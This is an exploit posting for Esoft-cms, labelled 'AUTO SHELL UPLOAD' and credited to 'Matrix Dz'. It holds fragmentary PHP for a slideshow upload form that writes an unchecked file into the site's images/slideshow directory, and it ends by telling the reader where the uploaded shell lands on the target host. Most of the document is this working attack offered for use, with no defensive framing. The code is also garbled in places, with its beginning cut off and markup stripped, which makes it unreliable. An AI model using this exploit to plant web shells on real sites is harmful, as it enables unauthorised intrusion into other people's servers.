SEO

# Exploit Title: Exploiter Esoft-cms | AUTO SHELL UPLOAD | # Google Dork: Use Your Brain :p # Date: 13-08-2015 # Exploit Founded & Author: Matrix Dz # Version: 1.1 # Tested on: Linux , Win 7 , XP , Mac OS Here The Exploit Code : Please DONT Change AUthor :) =$max_file_size){ echo "only the file less than ".$max_file_size."mb allowed to upload"; // exit the script by warning } $path=$photo_name.'.'.$ext; if(move_uploaded_file($file['tmp_name'],$upload_directory.$path)){ $uploadfile=$path; } else{ echo "The file cant moved to target directory."; //file can't moved with unknown reasons likr cleaning of server temperory files cleaning } } $slideshow_title=mysql_real_escape_string($_POST['sl_photo_caption']); $sl_url = mysql_real_escape_string($_POST['sl_url']); $position = mysql_real_escape_string($_POST['position']); $page = mysql_real_escape_string($_POST['page']); $insert="insert into slideshow(photo,slide_title,url,position,page) values ('$uploadfile','$slideshow_title','$sl_url','$position','$page')"; if(mysql_query($insert)){ echo ''; } else{ echo ''; } } ?>
Exploiter Esoft-cms | AUTO SHELL UPLOAD | exploit Founded And Author By Matrix Dz

Select Photo

Slide Caption
Slide position(home Page)
Slide position(Other Page)
'; } } ?>

Edit or Delete Photo


Si. No Preview Caption Page Action
Delete
Youcan Find Shell in www.host.com/mhcms-admin/images/slideshow/randomname.php OR www.host.com/esoft-cms/images/slideshow/randomname.php